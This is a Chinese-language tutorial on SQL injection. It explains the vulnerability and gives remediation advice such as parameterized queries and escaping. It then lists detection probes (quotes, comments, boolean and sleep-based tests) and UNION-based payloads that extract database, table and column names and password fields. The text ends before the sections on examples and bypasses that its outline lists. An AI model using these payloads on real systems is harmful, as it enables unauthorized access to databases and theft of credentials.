一、SQL注入漏洞介绍
二、修复建议
三、通用姿势
四、具体实例
五、各种绕过
一、SQL注入漏洞介绍:
SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(如关闭数据库管理系统)、恢复存在于数据库文件系统中的指定文件内容,在某些情况下能对操作系统发布命令。SQL注入攻击是一种注入攻击。它将SQL命令注入到数据层输入,从而影响执行预定义的SQL命令。由于用户的输入,也是SQL语句的一部分,所以攻击者可以利用这部分可以控制的内容,注入自己定义的语句,改变SQL语句执行逻辑,让数据库执行任意自己需要的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何自己需要的数据,利用数据库的一些特性,可以直接获取数据库服务器的系统权限。
二、修复建议
使用参数化查询接口或在代码级对带入SQL语句中的外部参数进行转义或过滤;
对于整数,判断变量是否符合[0-9]的值;其他限定值,也可以进行合法性校验;
对于字符串,对SQL语句特殊字符进行转义(单引号转成两个单引号,双引号转成两个双引号)。
三、通用姿势
3.1 通过以下操作先大概判断是否存在注入点
如果参数(id)是数字,测试id=2-1与id=1返回的结果是否相同,如果做了2-1=1的运算,说明可能存在数字型注入。如果要用+号运算的话,因为URL编码的问题,需要把加好换成%2B,如id=1%2B1
在参数后面加单引号或双引号,判断返回结果是否有报错
添加注释符,判断前后是否有报错,如id=1\' --+ 或 id=1" --+ 或id=1\' # 或id=1" --+ (--后面跟+号,是把+当成空格使用)
有些参数可能在括号里面,如:SELECT first_name, last_name FROM users WHERE user_id = (\'$id\');所以也可以在参数后面加单双引号和括号,如id=1\') --+ 或 id=1") --+ 或id=1\') # 或id=1") --+
参数后面跟or 或者and,判断返回结果是否有变化,如1\' or \'a\'=\'a 或者and \'a\'=\'a或者1\' or \'a\'=\'b或者1\' or \'1\'=\'2
如果返回的正确页面与错误页面都一样,可以考虑时间延迟的方法判断是否存在注入,如 1’ and sleep(5)
3.2 如果存在注入,利用注入获取信息
3.2.1 查询结果如果可以直接返回
利用联合查询一步步的获取信息,如:
// 获取数据库名称,注意联合查询要求前后查询的列数和数据类型必须对应
1\' union select schema_name ,1 from information_schema.schemata --
//根据上一步获取的数据库名称,获取表名
1\' union select table_name from information_schema.tables where table_schema=\'database_name\'
//根据上面的数据库名称和表名获取字段名
1\' union select column_name from information_schema.columns where table_schema=\'database_name\' and table_name=\'table_name\'
//获取字段值,使用group_concat的目的是把查询结果合并成1列,另外,如果跨数据库查询值得花,需要使用数据库名.表明的格式,比如information_schema.schemata
1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from 数据库名.表名